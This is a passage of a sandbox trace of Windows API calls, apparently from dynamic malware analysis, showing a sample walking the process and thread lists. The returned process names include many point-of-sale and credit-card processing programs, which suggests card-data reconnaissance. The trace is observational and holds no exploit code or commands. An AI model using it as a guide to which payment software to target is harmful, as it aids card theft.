lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0168.490] GetTickCount () returned 0x11596f3 [0168.490] GetCurrentThreadId () returned 0x324 [0168.490] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.490] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.490] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0168.491] GetTickCount () returned 0x11596f3 [0168.492] GetCurrentThreadId () returned 0x324 [0168.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.492] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0168.493] GetTickCount () returned 0x11596f3 [0168.493] GetCurrentThreadId () returned 0x324 [0168.493] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.493] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.493] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0168.494] GetTickCount () returned 0x11596f3 [0168.494] GetCurrentThreadId () returned 0x324 [0168.494] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.494] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.494] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0168.495] GetTickCount () returned 0x11596f3 [0168.495] GetCurrentThreadId () returned 0x324 [0168.495] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.495] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.495] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0168.496] GetTickCount () returned 0x11596f3 [0168.496] GetCurrentThreadId () returned 0x324 [0168.496] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.496] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.496] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0168.497] GetTickCount () returned 0x11596f3 [0168.497] GetCurrentThreadId () returned 0x324 [0168.497] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.497] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.497] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0168.498] GetTickCount () returned 0x11596f3 [0168.498] GetCurrentThreadId () returned 0x324 [0168.498] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.498] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.498] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0168.499] GetTickCount () returned 0x11596f3 [0168.499] GetCurrentThreadId () returned 0x324 [0168.499] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.499] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.499] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0168.500] GetTickCount () returned 0x1159702 [0168.500] GetCurrentThreadId () returned 0x324 [0168.500] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.500] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.500] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0168.501] GetTickCount () returned 0x1159702 [0168.501] GetCurrentThreadId () returned 0x324 [0168.501] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.501] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.501] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0168.501] GetTickCount () returned 0x1159702 [0168.501] GetCurrentThreadId () returned 0x324 [0168.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.502] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0168.502] GetTickCount () returned 0x1159702 [0168.502] GetCurrentThreadId () returned 0x324 [0168.502] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.502] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.503] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0168.503] GetTickCount () returned 0x1159702 [0168.503] GetCurrentThreadId () returned 0x324 [0168.503] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.503] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.504] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0168.504] GetTickCount () returned 0x1159702 [0168.504] GetCurrentThreadId () returned 0x324 [0168.504] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.504] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.504] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0168.505] GetTickCount () returned 0x1159702 [0168.505] GetCurrentThreadId () returned 0x324 [0168.505] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.505] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.505] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="consolidationbeside.exe")) returned 1 [0168.506] GetTickCount () returned 0x1159702 [0168.506] GetCurrentThreadId () returned 0x324 [0168.506] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.507] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.507] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mrs-manitoba.exe")) returned 1 [0168.507] GetTickCount () returned 0x1159702 [0168.507] GetCurrentThreadId () returned 0x324 [0168.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.508] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.508] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="internationally-seasonal.exe")) returned 1 [0168.508] GetTickCount () returned 0x1159702 [0168.508] GetCurrentThreadId () returned 0x324 [0168.508] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.509] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.509] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0168.509] GetTickCount () returned 0x1159702 [0168.510] GetCurrentThreadId () returned 0x324 [0168.510] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.510] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.510] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0168.511] GetTickCount () returned 0x1159702 [0168.511] GetCurrentThreadId () returned 0x324 [0168.511] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.511] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.511] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0168.512] GetTickCount () returned 0x1159702 [0168.512] GetCurrentThreadId () returned 0x324 [0168.512] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.512] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.512] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.513] GetTickCount () returned 0x1159702 [0168.513] GetCurrentThreadId () returned 0x324 [0168.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.513] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.513] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0168.513] GetTickCount () returned 0x1159702 [0168.513] GetCurrentThreadId () returned 0x324 [0168.513] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.514] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.514] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0168.514] GetTickCount () returned 0x1159712 [0168.514] GetCurrentThreadId () returned 0x324 [0168.514] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.514] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.514] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x414, pcPriClassBase=13, dwFlags=0x0, szExeFile="OnB5h0yX46mreVq4.exe")) returned 1 [0168.515] GetTickCount () returned 0x1159712 [0168.515] GetCurrentThreadId () returned 0x324 [0168.515] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.515] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.515] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0168.516] GetTickCount () returned 0x1159712 [0168.516] GetCurrentThreadId () returned 0x324 [0168.516] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.516] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.516] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0xa64, pcPriClassBase=13, dwFlags=0x0, szExeFile="OnB5h0yX46mreVq4.exe")) returned 1 [0168.517] GetTickCount () returned 0x1159712 [0168.517] GetCurrentThreadId () returned 0x324 [0168.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.517] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0168.518] GetTickCount () returned 0x1159712 [0168.518] GetCurrentThreadId () returned 0x324 [0168.518] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.518] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.518] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin1.exe")) returned 1 [0168.519] GetTickCount () returned 0x1159712 [0168.519] GetCurrentThreadId () returned 0x324 [0168.519] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.519] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.519] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x75c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin2.exe")) returned 1 [0168.520] GetTickCount () returned 0x1159712 [0168.520] GetCurrentThreadId () returned 0x324 [0168.520] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.520] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.520] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x75c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin2.exe")) returned 0 [0168.521] GetTickCount () returned 0x1159712 [0168.521] Thread32First (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.521] GetCurrentThreadId () returned 0x324 [0168.521] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.522] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.522] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.524] GetTickCount () returned 0x1159712 [0168.524] GetCurrentThreadId () returned 0x324 [0168.524] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.524] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.524] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.525] GetTickCount () returned 0x1159712 [0168.525] GetCurrentThreadId () returned 0x324 [0168.525] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.525] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.525] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.525] GetTickCount () returned 0x1159712 [0168.525] GetCurrentThreadId () returned 0x324 [0168.525] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.525] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.525] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.527] GetTickCount () returned 0x1159712 [0168.527] GetCurrentThreadId () returned 0x324 [0168.527] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.527] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.527] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.528] GetTickCount () returned 0x1159712 [0168.528] GetCurrentThreadId () returned 0x324 [0168.528] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.528] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.528] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.529] GetTickCount () returned 0x1159712 [0168.529] GetCurrentThreadId () returned 0x324 [0168.529] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.529] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.529] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.530] GetTickCount () returned 0x1159712 [0168.530] GetCurrentThreadId () returned 0x324 [0168.530] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.531] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.531] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.532] GetTickCount () returned 0x1159722 [0168.532] GetCurrentThreadId () returned 0x324 [0168.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.532] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.532] GetTickCount () returned 0x1159722 [0168.532] GetCurrentThreadId () returned 0x324 [0168.532] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.532] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.532] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.533] GetTickCount () returned 0x1159722 [0168.533] GetCurrentThreadId () returned 0x324 [0168.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.533] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.533] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.534] GetTickCount () returned 0x1159722 [0168.534] GetCurrentThreadId () returned 0x324 [0168.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.534] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.534] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.535] GetTickCount () returned 0x1159722 [0168.535] GetCurrentThreadId () returned 0x324 [0168.535] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.535] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.535] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.536] GetTickCount () returned 0x1159722 [0168.536] GetCurrentThreadId () returned 0x324 [0168.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.536] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.536] GetTickCount () returned 0x1159722 [0168.536] GetCurrentThreadId () returned 0x324 [0168.536] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.536] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.536] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.537] GetTickCount () returned 0x1159722 [0168.537] GetCurrentThreadId () returned 0x324 [0168.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.537] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.537] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.538] GetTickCount () returned 0x1159722 [0168.538] GetCurrentThreadId () returned 0x324 [0168.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.538] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.539] GetTickCount () returned 0x1159722 [0168.539] GetCurrentThreadId () returned 0x324 [0168.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.539] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.540] GetTickCount () returned 0x1159722 [0168.540] GetCurrentThreadId () returned 0x324 [0168.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.540] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.540] GetTickCount () returned 0x1159722 [0168.540] GetCurrentThreadId () returned 0x324 